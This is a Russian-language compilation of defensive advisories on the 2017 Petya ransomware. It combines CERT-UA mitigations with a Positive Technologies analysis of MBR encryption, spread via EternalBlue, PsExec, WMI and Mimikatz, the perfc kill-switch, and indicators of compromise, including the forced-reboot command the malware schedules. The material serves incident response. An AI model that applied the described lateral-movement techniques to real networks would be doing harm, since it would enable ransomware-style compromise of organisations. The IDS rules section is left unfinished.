Обеспечить недопустимость открытия вложений в подозрительных сообщениях (в письмах от адресантов, относительно которых возникают подозрения, например: автор по неизвестным причинам изменил язык общения; тема письма является нетипичной для автора; нетипичное обращение к адресату и т.д.; сообщения с нестандартным текстом, побуждающие к переходу на подозрительные ссылки или к открытию подозрительных файлов — архивов, исполняемых файлов и т.д.).
Системным администраторам и администраторам безопасности обратить внимание на фильтрование входящих/исходящих информационных потоков, в частности почтового и веб-трафика.
Установить официальный патч MS17-010.
На сетевом оборудовании и групповыми политиками заблокировать на системах и серверах порты 135, 445, 1024-1035 TCP.
В случае инфицирования персонального компьютера не перезагружать систему.
Ограничить возможность запуска исполняемых файлов (.exe) на компьютерах пользователей из директорий %TEMP%, %APPDATA%.
Обратиться к рекомендациям CERT-UA по поводу безопасности почтовых сервисов.
Для возможности восстановления зашифрованных файлов воспользоваться программами ShadowExplorer или PhotoRec.
Источник: CERT-UA

Требования - офис 2007sp3 и новее.Windows 7 sp1 и новее
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199

13 апреля в 22:46
Началась массовая рассылка документов, использующих 0day-уязвимость в Word

https://geektimes.ru/post/288088/

Анализ образца вымогателя, проведенный нашими экспертами, показал, что принцип действия Petya основан на шифровании главной загрузочной записи (MBR) загрузочного сектора диска и замене его своим собственным. Эта запись – первый сектор на жёстком диске, в нем расположена таблица разделов и программа-загрузчик, считывающая из этой таблицы информацию о том, с какого раздела жёсткого диска будет происходить загрузка системы. Исходный MBR сохраняется в 0x22-ом секторе диска и зашифрован с помощью побайтовой операции XOR с 0x07.

После запуска вредоносного файла создается задача на перезапуск компьютера, отложенная на 1-2 часа, в это время можно успеть запустить команду bootrec /fixMbr для восстановления MBR и восстановить работоспособность ОС. Таким образом, запустить систему даже после ее компрометации возможно, однако расшифровать файлы не удастся. Для каждого диска генерируется свой ключ AES, который существует в памяти до завершения шифрования. Он шифруется на открытом ключе RSA и удаляется. Восстановление содержимого после завершения требует знания закрытого ключа, таким образом, без знания ключа данные восстановить невозможно. Предположительно, зловред шифрует файлы максимум на глубину 15 директорий. То есть файлы, вложенные на большую глубину, находятся в безопасности (по крайней мере для данной модификации шифровальщика).

В случае, если диски оказались успешно зашифрованы после перезагрузки, на экран выводится окно с сообщением о требовании заплатить выкуп $300 (на 27 июня 2017 — примерно 0,123 биткойна) для получения ключа разблокировки файлов. Для перевода денег указан биткоин-кошелек 1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX. Через несколько часов после начала атаки на кошелек уже поступают транзакции, кратные запрошенной сумме – некоторые жертвы предпочли заплатить выкуп, не дожидаясь, пока исследователи изучат зловред и попытаются найти средство восстановления файлов.

Petya использует 135, 139, 445 TCP-порты для распространения (с использованием служб SMB и WMI). Распространение внутри сети на другие узлы происходит несколькими методами: с помощью Windows Management Instrumentation (WMI) и PsExec, а также с помощью эксплойта, использующего уязвимость MS17-010 (EternalBlue). WMI – это технология для централизованного управления и слежения за работой различных частей компьютерной инфраструктуры под управлением платформы Windows. PsExec широко используется для администрирования Windows и позволяет выполнять процессы в удаленных системах. Однако для использования данных утилит необходимо обладать привилегиями локального администратора на компьютере жертвы, а значит, шифровальщик может продолжить свое распространение только с тех устройств, пользователь которых обладает максимальными привилегиями ОС. Эксплойт EternalBlue позволяет получить максимальные привилегии на уязвимой системе. Также шифровальщик использует общедоступную утилиту Mimikatz для получения в открытом виде учетных данных всех пользователей ОС Windows, в том числе локальных администраторов и доменных пользователей. Такой набор инструментария позволяет Petya сохранять работоспособность даже в тех инфраструктурах, где был учтен урок WannaCry и установлены соответствующие обновления безопасности, именно поэтому шифровальщик настолько эффективен.

В рамках тестирований на проникновение современных корпоративных инфраструктур эксперты Positive Technologies регулярно демонстрируют возможность применения эксплойта EternalBlue (в 44% работ в 2017 году), а также успешное применение утилиты Mimikatz для развития вектора атаки до получения полного контроля над доменом (в каждом проекте).

Таким образом, Petya обладает функциональностью, позволяющей ему распространяться на другие компьютеры, причем этот процесс лавинообразный. Это позволяет шифровальщику скомпрометировать в том числе контроллер домена и развить атаку до получения контроля над всеми узлами домена, что эквивалентно полной компрометации инфраструктуры.

О существующей угрозе компрометации мы сообщали более месяца назад в оповещениях об атаке WannaCry и давали рекомендации, каким образом определить уязвимые системы, как их защитить и что делать, если атака уже произошла. Дополнительные рекомендации мы дадим и в данной статье. Кроме того, наша компания разработала бесплатную утилиту WannaCry_Petya_FastDetect для автоматизированного выявления уязвимости в инфраструктуре. Система MaxPatrol выявляет данную уязвимость как в режиме Audit, так и в режиме Pentest. Подробная инструкция указана в наших рекомендациях. Кроме того, в MaxPatrol SIEM заведены соответствующие правила корреляции для выявления атаки Petya.

Эксперты Positive Technologies выявили “kill-switch” – возможность локально отключить шифровальщик. Если процесс имеет административные привилегии в ОС, то перед подменой MBR шифровальщик проверяет наличие файла perfc (либо другого пустого файла с иным названием) без расширения в директории C:\Windows\ (директория жестко задана в коде). Этот файл носит то же имя, что и библиотека dll данного шифровальщика (но без расширения).

Наличие такого файла в указанной директории может быть одним из индикаторов компрометации. Если файл присутствует в данной директории, то процесс выполнения ВПО завершается, таким образом, создание файла с правильным именем может предотвратить подмену MBR и дальнейшее шифрование.



Если шифровальщик при проверке не обнаружит такой файл, то файл создается и стартует процесс выполнения ВПО. Предположительно, это происходит для того, чтобы повторно не запустился процесс подмены MBR.

С другой стороны, если процесс изначально не обладает административными привилегиями, то шифровальщик не сможет выполнить проверку наличия пустого файла в директории C:\Windows\, и процесс шифрования файлов все же запустится, но без подмены MBR и перезапуска компьютера.
Для того, чтобы не стать жертвой подобной атаки, необходимо в первую очередь обновить используемое ПО до актуальных версий, в частности, установить все актуальные обновления MS Windows. Кроме того, необходимо минимизировать привилегии пользователей на рабочих станциях.

Если заражение уже произошло, мы не рекомендуем платить деньги злоумышленникам. Почтовый адрес нарушителей wowsmith123456@posteo.net был заблокирован, и даже в случае оплаты выкупа ключ для расшифрования файлов наверняка не будет получен. Для предотвращения распространения шифровальщика в сети рекомендуется выключить другие компьютеры, которые не были заражены, отключить от сети зараженные узлы и снять образы скомпрометированных систем. В случае, если исследователи найдут способ расшифрования файлов, заблокированные данные могут быть восстановлены в будущем. Кроме того, данный образ может быть использован для проведения анализа шифровальщика, что поможет исследователям в их работе.

В долгосрочной перспективе рекомендуется разработать систему регулярных тренингов сотрудников с целью повышения их осведомленности в вопросах информационной безопасности, основанную на демонстрации практических примеров потенциально возможных атак на инфраструктуру компании с использованием методов социальной инженерии. Необходимо проводить регулярную проверку эффективности таких тренингов. Также необходимо на все компьютеры установить антивирусное ПО с функцией самозащиты, предусматривающей ввод специального пароля для отключения или изменения настроек. Кроме того, необходимо обеспечить регулярное обновление ПО и ОС на всех узлах корпоративной инфраструктуры, а также эффективный процесс управления уязвимостями и обновлениями. Регулярное проведение аудитов ИБ и тестирований на проникновение позволит своевременно выявлять существующие недостатки защиты и уязвимости систем. Регулярный мониторинг периметра корпоративной сети позволит контролировать доступные из сети Интернет интерфейсы сетевых служб и вовремя вносить корректировки в конфигурацию межсетевых экранов. Для своевременного выявления и пресечения уже случившейся атаки необходимо осуществлять мониторинг внутренней сетевой инфраструктуры, для чего рекомендуется применять систему класса SIEM.

Для выявления атаки Petya в инфраструктуре могут быть использованы следующие индикаторы:

C:\Windows\perfс
Задача в планировщике Windows с пустым именем и действием (перезагрузка)
"%WINDIR%\system32\shutdown.exe /r /f"

Срабатывание правил IDS/IPS:
<не влезло>


https://habrahabr.ru/company/pt/blog/331858/